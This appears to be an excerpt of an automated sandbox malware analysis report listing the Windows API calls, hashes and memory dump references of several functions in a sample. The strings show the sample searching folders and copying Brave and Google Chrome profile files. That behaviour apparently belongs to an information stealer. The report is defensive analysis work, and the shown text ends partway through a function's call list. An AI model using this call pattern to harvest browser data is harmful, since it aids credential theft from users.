                                • Opcode Fuzzy Hash: 2a6568a5a5cba93fd5fded856071aa0e5080ac890e9837bbf2b7601ed029375e
                                • Instruction Fuzzy Hash: 75A28231A012169FCB61BF75DD8CAAE77B8EF49704F098024F819E7252DB34EE059B94
                                Function 00C716A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C716E2
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7176C
                                • lstrcat.KERNEL32(00000000), ref: 00C71776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C717EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C717F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71875
                                • lstrcat.KERNEL32(00000000), ref: 00C7187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C718AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C718F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C718FE
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71929
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71966
                                • lstrlen.KERNEL32(\*.*), ref: 00C71971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C7199A
                                  • Part of subcall function 00C94040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00C9406D
                                  • Part of subcall function 00C94040: lstrcpy.KERNEL32(00000000,?), ref: 00C940A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C719C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71A16
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71A41
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71A81
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71AAC
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C71B45
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C71B70
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C71B8A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71C03
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71C31
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71C74
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71CA2
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71CAE
                                • lstrlen.KERNEL32(?), ref: 00C71CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71CE9
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71D14
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71DEB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71E19
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C71E56
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71E81
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C71E8D
                                • lstrlen.KERNEL32(?), ref: 00C71E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C71F45
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71F9F
                                • lstrlen.KERNEL32(01798908), ref: 00C71FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71FE3
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7200E
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C72042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7204D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C72058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72075
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72081
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: ad3f43a7561cd72e4e749873e43d1501db9c4f55c900da8e3397bd9ce41c9d25
                                • Instruction ID: 88328db14f45e93e1156fa1da5d44a21c35f9c8c7f0262d27c0e26c260c24995
                                • Opcode Fuzzy Hash: ad3f43a7561cd72e4e749873e43d1501db9c4f55c900da8e3397bd9ce41c9d25
                                • Instruction Fuzzy Hash: B1928531A112169FCB21AFA9DD88AAF77B9EF45700F098024FD1DA7251DB30EE05DB90
                                Function 00C7DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DBEF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C7DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC17
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C7DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC4C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DC8F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C7DCD0
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C7DCF0
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C7DD0A
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C7DD1D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DD7B
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDA3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DDAF
                                • lstrlen.KERNEL32(?), ref: 00C7DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DE19
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DE6F
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DE7B
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DEBB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DEE6
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DEF2
                                • lstrlen.KERNEL32(01798A88), ref: 00C7DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFA5
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DFB1
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DFF4
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E022
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7E02E
                                • lstrlen.KERNEL32(01798A88), ref: 00C7E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00C7E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00C7E0E7
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E11F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E19F
                                • lstrcat.KERNEL32(00000000), ref: 00C7E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E1F9
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E22F
                                • lstrlen.KERNEL32(01798908), ref: 00C7E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E261
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C7E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00C7E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00C7E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E349
                                • DeleteFileA.KERNEL32(?), ref: 00C7E381
                                • StrCmpCA.SHLWAPI(?,0179D8E0), ref: 00C7E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E445
                                • StrCmpCA.SHLWAPI(?,01798A88), ref: 00C7E468
                                • StrCmpCA.SHLWAPI(?,01798AD8), ref: 00C7E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C7E4E0
                                • StrCmpCA.SHLWAPI(?,0179D868), ref: 00C7E58E
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00C7E776
                                • DeleteFileA.KERNEL32(?), ref: 00C7E7D2
                                • StrCmpCA.SHLWAPI(?,017988F8), ref: 00C7E7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E952
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: cfde230435d96214b4a2033edd9d1045102503e9c1b2893992b814e094ba97d3
                                • Instruction ID: edcb76217ef9210c9b1f1fdf88cf01bfdd0bd8feb02ed94a71b0aa757481fa31
                                • Opcode Fuzzy Hash: cfde230435d96214b4a2033edd9d1045102503e9c1b2893992b814e094ba97d3
                                • Instruction Fuzzy Hash: 4A929471A112069FCB60EFB5DC89AAE77B9EF48300F088564F81AE7251DB34ED45DB90
                                Function 00C818A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C818D2
                                • lstrlen.KERNEL32(\*.*), ref: 00C818DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C818FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C8190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C81947
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C81967
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81981
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C819BF
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C819F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81A4C
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81A80
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81AB4
                                • lstrlen.KERNEL32(?), ref: 00C81AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B19
                                • lstrlen.KERNEL32(01798998), ref: 00C81B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81B8F
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81BC3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C57
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81C8B
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D21
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D55
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C81DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81DED
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81E36
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81E68
                                • lstrlen.KERNEL32(0179D838), ref: 00C81E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81EB2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81EC6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81EE3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81EEF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F15
                                • lstrlen.KERNEL32(0179DD70), ref: 00C81F2B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F5F
                                • lstrlen.KERNEL32(00CA1794), ref: 00C81F73
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81F90
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81F9C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81FC2
                                • lstrlen.KERNEL32(0178A618), ref: 00C81FD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82000
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8200B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82036
                                • lstrlen.KERNEL32(00CA1794), ref: 00C82048
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82067
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C82073
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82098
                                • lstrlen.KERNEL32(?), ref: 00C820AC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C820D0
                                • lstrcat.KERNEL32(00000000,?), ref: 00C820DE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82103
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8213F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C8214E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C82176
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82181
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                • String ID: \*.*
                                • API String ID: 712834838-1173974218
                                • Opcode ID: 923039147c552edad20268ae9035cd24cf196464be1e902cd433ea9dd9c4ed0f
                                • Instruction ID: 46ad5b63c172e5347d51a27a73861309b4d9061e9f30bc58387a7c5493b9a12d
                                • Opcode Fuzzy Hash: 923039147c552edad20268ae9035cd24cf196464be1e902cd433ea9dd9c4ed0f
                                • Instruction Fuzzy Hash: C06282316116169FCB21BF65CC88AAFB7F9EF45704F098024F819A7252DB34EE06DB94
                                Function 00C83910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C8392C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C83943
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8396C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C83986
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C839BF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C839E7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C839F2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C839FD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A1A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83A26
                                • lstrlen.KERNEL32(?), ref: 00C83A33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A53
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83A61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83A8A
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C83ACE
                                • lstrlen.KERNEL32(?), ref: 00C83AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B36
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B6A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83B9E
                                • lstrlen.KERNEL32(?), ref: 00C83BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83BE0
                                • lstrlen.KERNEL32(01798908), ref: 00C83C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83C3C
                                • lstrlen.KERNEL32(01798998), ref: 00C83C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83CB7
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83CE8
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C83D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83D79
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83DAD
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83DB9
